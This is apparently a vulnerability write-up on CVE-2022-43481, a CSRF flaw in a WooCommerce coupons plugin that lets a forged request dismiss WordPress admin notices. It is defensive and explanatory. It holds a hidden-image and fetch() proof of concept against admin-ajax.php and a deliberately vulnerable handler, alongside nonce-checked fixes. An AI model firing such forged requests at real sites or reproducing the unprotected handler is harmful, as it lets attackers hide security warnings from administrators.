The world of WordPress plugins is vast and ever-growing, but with convenience comes responsibility. In this long read, we take a deep dive into CVE-2022-43481—a Cross-Site Request Forgery (CSRF) vulnerability found in the popular “Advanced Coupons for WooCommerce Coupons” plugin up to version 4.5. This bug, while not granting total control to attackers, allows them to trick logged-in administrators into unknowingly dismissing important admin notices. These notices are often crucial for plugin operation, updates, and security.
Let’s break down how this vulnerability works, see some simple proof-of-concept code, and talk protection.
What is CVE-2022-43481?
The vulnerability is a missing nonce check in the way the Advanced Coupons for WooCommerce Coupons plugin handles the AJAX request used for dismissing admin notices. In simpler words: if you’re logged in as an administrator and visit a malicious website, that site can send a request—on your behalf—to your own WordPress admin, making you unknowingly remove important notifications.
Official Advisory:
- WPScan: https://wpscan.com/vulnerability/190a1e71-ac5f-484-8af6-ee06643b8b45
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-43481
- Patchstack: https://patchstack.com/database/vulnerability/advanced-coupons-for-woocommerce-free/wordpress-advanced-coupons-for-woocommerce-free-plugin-4-5-cross-site-request-forgery-csrf-vulnerability
How Does the Attack Work?
The plugin has an AJAX handler that lets you, as an admin, dismiss certain admin notices. Unfortunately, it used only the user’s permissions—not a security nonce—to validate these actions. No anti-CSRF token means anyone who can make you visit a crafted web page (think: phishing email, malicious ad, or even a compromised site) could trick your browser into sending the “dismiss notice” request.
The attacker’s goal here isn't to take over the site; rather, it’s to manipulate your admin experience. In some scenarios, attackers could use this to cover their traces by hiding security warnings or notifications about malicious plugins.
Simple Proof-of-Concept (PoC) Exploit
Here’s how a proof-of-concept exploit could look in HTML/JavaScript. If an administrator is logged into their WordPress dashboard and visits a page containing this code (maybe on a compromised website), it fires the dismiss request silently in the background:
<!DOCTYPE html>
<html>
<body>
  <!-- Replace 'your-wordpress-site.com' with the target site domain -->
  <img src="https://your-wordpress-site.com/wp-admin/admin-ajax.php?action=acfw_dismiss_admin_notice&notice_id=acfw_some_notice_id" style="display:none">
</body>
</html>
Or, using JavaScript for more flexibility:
fetch("https://your-wordpress-site.com/wp-admin/admin-ajax.php?action=acfw_dismiss_admin_notice&notice_id=acfw_some_notice_id", {
  credentials: "include"
});
What’s happening here?
Any logged-in admin’s browser will send the request, with their cookies included. WordPress sees this as a real admin dismissing a notice—no warning, no pop-up, just quiet removal of potentially vital messages.
Why Should You Care?
Even “minor” CSRF vulnerabilities matter. Hidden notices could delay patching of more serious security holes or allow other attacks to go unnoticed. Think of it as a way for hackers to erase their fingerprints after picking a lock.
Avoid browsing untrusted websites while logged in as an admin.
Developers:
- Always use check_admin_referer() or other nonce-verification functions for any action that changes settings, even if it seems harmless.
Here’s a simplified example of where things went wrong (in pseudocode):
// BAD: No CSRF token check
add_action('wp_ajax_acfw_dismiss_admin_notice', function() {
    $notice_id = $_GET['notice_id'];
    // Only the capability is checked, so any request carrying the admin's cookies passes
    if ( current_user_can('manage_woocommerce') ) {
        // ... dismiss notice logic ...
    }
});
Proper nonce protection should look like:
add_action('wp_ajax_acfw_dismiss_admin_notice', function() {
    // Third argument false: return false instead of dying, so we can send our own error
    if ( ! check_ajax_referer('acfw_dismiss_notice', '_wpnonce', false) ) {
        wp_send_json_error( 'Invalid nonce', 403 ); // calls wp_die() after sending
        return;
    }
    // Never trust request input: restrict the id to a safe key format
    $notice_id = isset( $_GET['notice_id'] ) ? sanitize_key( $_GET['notice_id'] ) : '';
    if ( '' !== $notice_id && current_user_can('manage_woocommerce') ) {
        // ... dismiss notice logic ...
    }
});
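The snippet above shows the check but not where the nonce comes from. The following added example (written for this post, not the plugin’s actual code) pairs the two halves: the site mints the nonce and hands it to its own admin script, and the handler verifies it before the capability check and input handling. The identifiers containing "acfw_example" / "acfwExample", the script handle and the user-meta key are hypothetical.

```php
<?php
// Added example, not the plugin's code. Identifiers with "acfw_example"/"acfwExample" are hypothetical.

// 1. Mint a nonce server-side and hand it to the admin page's script. A third-party
//    page can make the browser send cookies, but it cannot read or guess this value.
add_action( 'admin_enqueue_scripts', function () {
    wp_register_script( 'acfw-example-notices', '', array(), '1.0', true );
    wp_enqueue_script( 'acfw-example-notices' );
    wp_localize_script( 'acfw-example-notices', 'acfwExample', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'acfw_dismiss_notice' ), // bound to user, session and a time window
    ) );
    // The legitimate client: dismiss buttons carry data-acfw-example-notice="<id>".
    wp_add_inline_script( 'acfw-example-notices', <<<'JS'
document.querySelectorAll('[data-acfw-example-notice]').forEach(function (btn) {
    btn.addEventListener('click', function () {
        fetch(acfwExample.ajaxUrl, {
            method: 'POST',
            credentials: 'same-origin',
            body: new URLSearchParams({
                action: 'acfw_dismiss_admin_notice',
                notice_id: btn.dataset.acfwExampleNotice,
                _wpnonce: acfwExample.nonce,
            }),
        });
    });
});
JS
    );
} );

// 2. The handler: nonce first, capability second, input sanitisation third.
add_action( 'wp_ajax_acfw_dismiss_admin_notice', function () {
    // Third argument false: return instead of wp_die() so we control the error response.
    if ( ! check_ajax_referer( 'acfw_dismiss_notice', '_wpnonce', false ) ) {
        wp_send_json_error( 'Invalid nonce', 403 ); // wp_send_json_* calls wp_die()
    }
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        wp_send_json_error( 'Insufficient permissions', 403 );
    }
    // Reading $_POST rather than $_GET also closes the hidden-<img> vector; the nonce is the real control.
    $notice_id = isset( $_POST['notice_id'] ) ? sanitize_key( wp_unslash( $_POST['notice_id'] ) ) : '';
    if ( '' === $notice_id ) {
        wp_send_json_error( 'Missing notice_id', 400 );
    }
    // Record the dismissal per user under a hypothetical meta key.
    update_user_meta( get_current_user_id(), 'acfw_example_dismissed_' . $notice_id, time() );
    wp_send_json_success( array( 'dismissed' => $notice_id ) );
} );
```

A request forged from another origin arrives with the admin’s cookies but without a valid `_wpnonce`, so check_ajax_referer() fails and the handler stops before touching the notice.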
More Data & References
- Original Patch: https://plugins.trac.wordpress.org/changeset/2813707/advanced-coupons-for-woocommerce-free
- Changelog: https://plugins.trac.wordpress.org/log/advanced-coupons-for-woocommerce-free/
Final Thoughts
While CVE-2022-43481 won’t let hackers take over your site, it still underscores why even “trivial” bugs matter. It’s a reminder to update plugins and check your site’s security stance regularly. If you use Advanced Coupons for WooCommerce Coupons, make sure you’re running a secured version.
Timeline
Published on: 11/08/2022 19:15:00 UTC
Last modified on: 11/09/2022 13:54:00 UTC